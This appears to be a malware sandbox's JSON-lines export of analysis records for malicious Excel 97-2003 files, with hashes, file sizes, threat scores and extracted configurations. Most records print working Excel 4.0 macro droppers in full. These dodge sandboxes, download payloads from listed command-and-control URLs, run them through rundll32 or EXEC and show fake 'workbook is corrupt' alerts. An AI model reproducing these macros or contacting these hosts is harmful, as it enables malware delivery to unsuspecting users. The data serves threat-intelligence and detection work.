CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"1TEOQUJ7YE\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"ac886c4be7c6ae12f5e324fa65bfd742eac43ecccc0b731ea2b4ebfff214ecdd"},"analysis":{"reported":"2020-04-09T16:18:16Z","score":10},"files":[{"filename":"ac886c4be7c6ae12f5e324fa65bfd742eac43ecccc0b731ea2b4ebfff214ecdd","filesize":152576,"md5":"e8804121223af886d19eb934965c8909","sha1":"56960ea9f17ec27bc7c4a68542af6b844bbf7d05","sha256":"ac886c4be7c6ae12f5e324fa65bfd742eac43ecccc0b731ea2b4ebfff214ecdd","sha512":"eb3cb391fcae5801bcb11dcc0798bf7c1088d84b431d061d7705de848f9fa8b08ef8695e57da8f563f1496c635d0a1a7014ef12b0f6e4646ae2ea548cdf78248","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"ac886c4be7c6ae12f5e324fa65bfd742eac43ecccc0b731ea2b4ebfff214ecdd.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/ajt1eg4fh3a"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/ajt1eg4fh3a\",\"c:\\Users\\Public\\awefwef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\awefwef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"zcdUYzKWc1\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"ac915df4187e1749fa14959562a71aa745895e3a2270062f4efa1f8a67e3a4d7"},"analysis":{"reported":"2020-04-09T16:18:16Z","score":10},"files":[{"filename":"ac915df4187e1749fa14959562a71aa745895e3a2270062f4efa1f8a67e3a4d7","filesize":185344,"md5":"570b5747b3cd4efa8059bd91948cf417","sha1":"f2fd16ce4d01b08f9a66126c05117dde4fb53c2e","sha256":"ac915df4187e1749fa14959562a71aa745895e3a2270062f4efa1f8a67e3a4d7","sha512":"47a7ac6cdeafaf5e31d0e53766fa9655422cc6a80463030b7c03886c23b25945e83b73edfc2ab3615127fbb3b76e15fc6287337e8be85023d2d33eeb7999834b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"ac915df4187e1749fa14959562a71aa745895e3a2270062f4efa1f8a67e3a4d7.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/DVkjbsdv37"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"ac96198d784fad046ce9180d05406ee6a79ba58457dd74d24a079bd7804ddb54"},"analysis":{"reported":"2020-04-09T16:18:16Z","score":10},"files":[{"filename":"ac96198d784fad046ce9180d05406ee6a79ba58457dd74d24a079bd7804ddb54","filesize":170496,"md5":"734b4d9c6deefe37fbca4ff3cb882924","sha1":"4c4e6577911a7e1c050d6fa85e74b90fab8394e1","sha256":"ac96198d784fad046ce9180d05406ee6a79ba58457dd74d24a079bd7804ddb54","sha512":"05e25a0710a2cc5906ffac08983e063674b26dcc883036d98a69295e64a81a3ba7e214d4c8a661d75db00915c8e95f606d26c8b5a68c1c53b67e9d3fae0286a2","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"ac96198d784fad046ce9180d05406ee6a79ba58457dd74d24a079bd7804ddb54.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Ba9Lm8fwvx\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"acae31280f9aad1d41070b0f401ac1f874273f64e0b4840345c4dc388d05b86f"},"analysis":{"reported":"2020-04-09T16:18:16Z","score":10},"files":[{"filename":"acae31280f9aad1d41070b0f401ac1f874273f64e0b4840345c4dc388d05b86f","filesize":167936,"md5":"5ef407119767493e683f7de7ddd2b295","sha1":"96719b38b6e32b4fba8e23f8238d7342f286e64e","sha256":"acae31280f9aad1d41070b0f401ac1f874273f64e0b4840345c4dc388d05b86f","sha512":"54636bfaf1c27d27a9e5266c6597298300403805f1734e76c84140bcb206f7379c243b20882a2e348e1e210e94d942f9d0e416e4bdde1c7d99c6869f3822c83b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"acae31280f9aad1d41070b0f401ac1f874273f64e0b4840345c4dc388d05b86f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"LPnTJkZjNn\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"acc51ffc07c836b993a7253c4a51265e9a12033831bcc575179fd64524c540d2"},"analysis":{"reported":"2020-04-09T16:18:16Z","score":10},"files":[{"filename":"acc51ffc07c836b993a7253c4a51265e9a12033831bcc575179fd64524c540d2","filesize":113664,"md5":"f9be30852829a8495b165647ad5007ed","sha1":"c3e090c95b698b12c515cd81deb48ef916670959","sha256":"acc51ffc07c836b993a7253c4a51265e9a12033831bcc575179fd64524c540d2","sha512":"c588808259f128d989be3658f49f4e530ffc27624ea070823a3ecaa920a3a8fb8d9ddf3c7ca8c08c10a270cd2831a95e0b7690a0c81792411c0656fb5155ec1f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"acc51ffc07c836b993a7253c4a51265e9a12033831bcc575179fd64524c540d2.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://samphaopet.com/wp-content/uploads/2020/02/idle/111111.png","http://icietdemain.fr/contents/2020/02/idle/222222.png","http://careers.sorint.it/idle/33333.png","http://uniluisgpaez.edu.co/wp-content/uploads/2020/02/idle/444444.png"],"attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nCALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://samphaopet.com/wp-content/uploads/2020/02/idle/111111.png\",\"c:\\Users\\Public\\asd2asff32.exe\",0,0)\nIF(R$6C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://icietdemain.fr/contents/2020/02/idle/222222.png\",\"c:\\Users\\Public\\asd2asff32.exe\",0,0),GOTO(EXEC(\"c:\\Users\\Public\\asd2asff32.exe\")))\nIF(R$7C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://careers.sorint.it/idle/33333.png\",\"c:\\Users\\Public\\asd2asff32.exe\",0,0),GOTO(EXEC(\"c:\\Users\\Public\\asd2asff32.exe\")))\nIF(R$8C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://uniluisgpaez.edu.co/wp-content/uploads/2020/02/idle/444444.png\",\"c:\\Users\\Public\\asd2asff32.exe\",0,0),GOTO(EXEC(\"c:\\Users\\Public\\asd2asff32.exe\")))\nIF(R$9C$0\u003c0,CLOSE(FALSE),)\nEXEC(\"c:\\Users\\Public\\asd2asff32.exe\")\nALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)\nCLOSE(FALSE)\nWORKBOOK.HIDE(\"LfBMcKAQOA\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"accaf967e3bca02694e211790d0d6fa0f656d77404c92882d2e00257080113db"},"analysis":{"reported":"2020-04-09T16:18:16Z","score":10},"files":[{"filename":"accaf967e3bca02694e211790d0d6fa0f656d77404c92882d2e00257080113db","filesize":167936,"md5":"7a56afb929909f36325de6e1a54a9fb3","sha1":"2d36eb0f3fa98eafb4ec0237e160e53ec872897c","sha256":"accaf967e3bca02694e211790d0d6fa0f656d77404c92882d2e00257080113db","sha512":"2c60c686716b0c3bf2d5502cbe684e464c8ff23146e7da4c59e2c6bd5e27ead1339b00c2cc825284ed6d45b49a9af4bd2d29a51f143d2675c209134ae7b23295","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"accaf967e3bca02694e211790d0d6fa0f656d77404c92882d2e00257080113db.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"HgHQmh6oUF\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"acce9bb8a64028ca0da02de2a63389d6721b24d60b057129e98ecda37dc7682c"},"analysis":{"reported":"2020-04-09T16:18:16Z","score":10},"files":[{"filename":"acce9bb8a64028ca0da02de2a63389d6721b24d60b057129e98ecda37dc7682c","filesize":207360,"md5":"8282f27f79b49c2b0adec6212f822c62","sha1":"730cea5ee966cce88f35eebc5f3eb4f384203eb1","sha256":"acce9bb8a64028ca0da02de2a63389d6721b24d60b057129e98ecda37dc7682c","sha512":"7ed94e8504684d9caf8c86e5f94afd3ceca60b96b65b25f41c3d44a34f8c454985e2eb835640a9eb64f7d584b00c7409750441b8b51d92f111401bab223c7917","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"acce9bb8a64028ca0da02de2a63389d6721b24d60b057129e98ecda37dc7682c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://greentec-automation.com/wp-crun.php","https://narensyndicate.com/wp-crun.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://greentec-automation.com/wp-crun.php\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://narensyndicate.com/wp-crun.php\",\"c:\\Users\\Public\\bwep5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"8wxyo0tRUM\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"ad0cd7ea7b64bbc7d6405e3e70d7d9cd21aa57a32322ebdee45521ad561240b2"},"analysis":{"reported":"2020-04-09T16:18:17Z","score":10},"files":[{"filename":"ad0cd7ea7b64bbc7d6405e3e70d7d9cd21aa57a32322ebdee45521ad561240b2","filesize":142848,"md5":"a76b064274d14b21fae9ae88c955fc7a","sha1":"67452ae2922a01ca7199763d4bb08e59d37e60fa","sha256":"ad0cd7ea7b64bbc7d6405e3e70d7d9cd21aa57a32322ebdee45521ad561240b2","sha512":"c795b04be583229fb5c0c1cb9b6f80a65fbe80b3f6e4aa565b4fceca82e7b7b5da7c58c15a12fa9d159a010aadf003ea566ac143a33b8adf912164024c248ff1","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"ad0cd7ea7b64bbc7d6405e3e70d7d9cd21aa57a32322ebdee45521ad561240b2.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pjtcdnrd.pw/fsgbfgbfsg43"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"K5618NkP7r\",TRUE)\nRETURN()\nRETURN()\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$20C$11\u003c770,CLOSE(FALSE),)\nIF(R$21C$11\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"ad1b4e6d5b9176f4de87720260413d87fd1518fde87591960e009624ba38bf3b"},"analysis":{"reported":"2020-04-09T16:18:17Z","score":10},"files":[{"filename":"ad1b4e6d5b9176f4de87720260413d87fd1518fde87591960e009624ba38bf3b","filesize":113664,"md5":"71faa04e28d7a11aa53f3b4db05bf7ff","sha1":"88f073a5de74eb7fdaa5ea2f6a5a8bf36557f89f","sha256":"ad1b4e6d5b9176f4de87720260413d87fd1518fde87591960e009624ba38bf3b","sha512":"7e36dcaad30a7a2f90a367615b148a7e9927b4eae860af0205164fb648fa629e119c5825456e005da984aaebf71fb7a036ff7dae4c1c86dd0b35446664e5416b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"ad1b4e6d5b9176f4de87720260413d87fd1518fde87591960e009624ba38bf3b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://samphaopet.com/wp-content/uploads/2020/02/idle/111111.png","http://icietdemain.fr/contents/2020/02/idle/222222.png","http://careers.sorint.it/idle/33333.png","http://uniluisgpaez.edu.co/wp-content/uploads/2020/02/idle/444444.png"],"attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nCALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://samphaopet.com/wp-content/uploads/2020/02/idle/111111.png\",\"c:\\Users\\Public\\asd2asff32.exe\",0,0)\nIF(R$6C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://icietdemain.fr/contents/2020/02/idle/222222.png\",\"c:\\Users\\Public\\asd2asff32.exe\",0,0),GOTO(EXEC(\"c:\\Users\\Public\\asd2asff32.exe\")))\nIF(R$7C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://careers.sorint.it/idle/33333.png\",\"c:\\Users\\Public\\asd2asff32.exe\",0,0),GOTO(EXEC(\"c:\\Users\\Public\\asd2asff32.exe\")))\nIF(R$8C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://uniluisgpaez.edu.co/wp-content/uploads/2020/02/idle/444444.png\",\"c:\\Users\\Public\\asd2asff32.exe\",0,0),GOTO(EXEC(\"c:\\Users\\Public\\asd2asff32.exe\")))\nIF(R$9C$0\u003c0,CLOSE(FALSE),)\nEXEC(\"c:\\Users\\Public\\asd2asff32.exe\")\nALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)\nCLOSE(FALSE)\nWORKBOOK.HIDE(\"Sy7dr8jZwD\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"ad249c82f16543b32f25c5e3567121a5bf787a8391deb056f2da0c6ab4a55f0a"},"analysis":{"reported":"2020-04-09T16:18:17Z","score":10},"files":[{"filename":"ad249c82f16543b32f25c5e3567121a5bf787a8391deb056f2da0c6ab4a55f0a","filesize":185344,"md5":"e6c6f6d03cb312f816da2291eba8abda","sha1":"1ea487b78431b4d1b452888cb2673d286da6f031","sha256":"ad249c82f16543b32f25c5e3567121a5bf787a8391deb056f2da0c6ab4a55f0a","sha512":"840a1f186896b92cf5d941da6b72548778d2307189ac234591e2cb6e5aea3ef928864a26a4d89ec902f3672dec04e755971352582487dae66a9e09268af711e1","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"ad249c82f16543b32f25c5e3567121a5bf787a8391deb056f2da0c6ab4a55f0a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"ad3497a8182a25c59040b8cf0d11dd68bdc457f0e4e15a54428cfeed2f4c954c"},"analysis":{"reported":"2020-04-09T16:18:17Z","score":10},"files":[{"filename":"ad3497a8182a25c59040b8cf0d11dd68bdc457f0e4e15a54428cfeed2f4c954c","filesize":170496,"md5":"11cadc35b87ddc349f5377b3da5ed556","sha1":"df8ef4f51f16cad574de48585ce8101462239345","sha256":"ad3497a8182a25c59040b8cf0d11dd68bdc457f0e4e15a54428cfeed2f4c954c","sha512":"832afe587d2f55bb530b00ba4a545b375d8e3733156219864ccfd1449580b5174cc3ec3d34a03c6afa6e9cae799ee3f58b4de0af1c8902e8fc67da2188c472fd","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"ad3497a8182a25c59040b8cf0d11dd68bdc457f0e4e15a54428cfeed2f4c954c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"z8oOJ7dmQm\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"ad52c6d1237eeab6d5832eaed2e52af801238024b29137d934248d1e743714da"},"analysis":{"reported":"2020-04-09T16:18:17Z","score":10},"files":[{"filename":"ad52c6d1237eeab6d5832eaed2e52af801238024b29137d934248d1e743714da","filesize":182784,"md5":"6feacf9c16e83212d310dd3360ffccac","sha1":"3ca993b0acf1022ac26fcda7772d278197289e39","sha256":"ad52c6d1237eeab6d5832eaed2e52af801238024b29137d934248d1e743714da","sha512":"c2c7c7654b77e7d6b61485c01379d8095df48e044b1842e60f15a68ff1ad07768b57eec3e0d2ffc7c330d90ff9ea1cc43ca7dc68fdd83402a1f9ad64234ca2b9","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"ad52c6d1237eeab6d5832eaed2e52af801238024b29137d934248d1e743714da.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://g2creditsolutions.com/trusty/444444.png","http://lorrainehomeconsulting.com/wp-content/uploads/2020/02/trusty/187213.png"],"attr":{"formulas":"ERROR(FALSE)\nCALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://g2creditsolutions.com/trusty/444444.png\",\"c:\\Users\\Public\\1.exe\",0,0)\nIF(R$1C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://lorrainehomeconsulting.com/wp-content/uploads/2020/02/trusty/187213.png\",\"c:\\Users\\Public\\1.exe\",0,0),)\nALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)\nEXEC(\"c:\\Users\\Public\\1.exe\")\nCLOSE(FALSE)\nWORKBOOK.HIDE(\"SDJKv3\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"ad5ea30af077a57b4c343a84b77de2e9868a23de361fb1e14a7aae067ede0c91"},"analysis":{"reported":"2020-04-09T16:18:17Z","score":10},"files":[{"filename":"ad5ea30af077a57b4c343a84b77de2e9868a23de361fb1e14a7aae067ede0c91","filesize":167424,"md5":"a34fc837668f1bcd0e1277d29cab8420","sha1":"bff808c45912e13d127a320eeef84601eb07ca1b","sha256":"ad5ea30af077a57b4c343a84b77de2e9868a23de361fb1e14a7aae067ede0c91","sha512":"7f9329a9fbc71653b343a288a317e544ababdc5d86f6178d36c0404e0dcb4a92457edfc9ac2496896ba5c774b1a5a90c19d796cbf22d9026c09f5b6e7a530b83","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"ad5ea30af077a57b4c343a84b77de2e9868a23de361fb1e14a7aae067ede0c91.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tdvomds.pw/fgwg24g24g"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"G2FasNcBoV\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$18C$2\u003c770,CLOSE(FALSE),)\nIF(R$19C$2\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nGOTO(R$39C$10)\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"ad750be668f932b3edc7fb9e4ec3cae70dee1b4801d702b70f884eb97e35b9c1"},"analysis":{"reported":"2020-04-09T16:18:17Z","score":10},"files":[{"filename":"ad750be668f932b3edc7fb9e4ec3cae70dee1b4801d702b70f884eb97e35b9c1","filesize":209920,"md5":"ec1c357b65be8e6f6b388f072856f881","sha1":"f4c7bd530950e7aee1b02f10a6e6b3bf3af5052e","sha256":"ad750be668f932b3edc7fb9e4ec3cae70dee1b4801d702b70f884eb97e35b9c1","sha512":"519ffeda468311de6c17cb59f605486a6349087ae89b489bd66cd83f9a2b531e3c7b373c02033a0c7c10e43b3e9a5104c3cd300cd9383603dcc6b0a568f8e453","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"ad750be668f932b3edc7fb9e4ec3cae70dee1b4801d702b70f884eb97e35b9c1.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"QMTD1ij42P\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"ad767c9241f065cb1d70f8d4659017cae352f8a9c0723207f76e85710fb0e8d9"},"analysis":{"reported":"2020-04-09T16:18:17Z","score":10},"files":[{"filename":"ad767c9241f065cb1d70f8d4659017cae352f8a9c0723207f76e85710fb0e8d9","filesize":112128,"md5":"ea152ea11d14f48f931b5550d2e04457","sha1":"950bf2dcb395337c9864d7c012ffa6a972b30805","sha256":"ad767c9241f065cb1d70f8d4659017cae352f8a9c0723207f76e85710fb0e8d9","sha512":"9fe157869848ef55c61228ba593d86f9ed7638895d31633e5ca9750fe22495bb1a32eff1d5014cf33005e9b8f9dc22dfe0e6bf83f30cbadad85777bb04656c4d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"ad767c9241f065cb1d70f8d4659017cae352f8a9c0723207f76e85710fb0e8d9.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KJSDBViad7"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
